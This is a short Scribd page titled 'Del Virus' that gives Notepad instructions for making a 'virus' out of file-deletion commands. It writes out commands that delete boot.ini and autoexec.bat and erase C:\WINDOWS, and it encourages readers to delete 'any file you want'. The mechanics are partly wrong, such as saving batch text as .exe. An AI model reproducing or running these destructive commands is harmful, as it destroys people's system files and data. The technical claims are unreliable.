0% found this document useful (0 votes)
73 views1 page

Del Virus

The document provides instructions for creating a simple virus using Notepad by writing commands to delete files and saving them as executable files. It shows how to delete a test file to demonstrate how the virus works, and provides a command to delete the C:\WINDOWS folder, though warns not to run it to avoid deleting the folder. The virus works by disguising destructive file deletion commands as executable files.

Uploaded by

Vijaiyesh Babu
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
73 views1 page

Del Virus

The document provides instructions for creating a simple virus using Notepad by writing commands to delete files and saving them as executable files. It shows how to delete a test file to demonstrate how the virus works, and provides a command to delete the C:\WINDOWS folder, though warns not to run it to avoid deleting the folder. The virus works by disguising destructive file deletion commands as executable files.

Uploaded by

Vijaiyesh Babu
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

First of all Open your notepad and type the following………

del c:\boot।ini c:\del autoexec.bat

Now Save as anyname.exe. Create this in C: drive

The only thing you need is Notepad.

1. Create a text file called TEST.txt(empty) in C:\


2. Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as “Test.cmd”.
3. Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.
Now, the real work :

1. Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.


2. Now DON’T Run the file or you’ll lose your WINDOWS map.
So, that’s the Virus. In this way you can make a virus to delete any file you want.

You might also like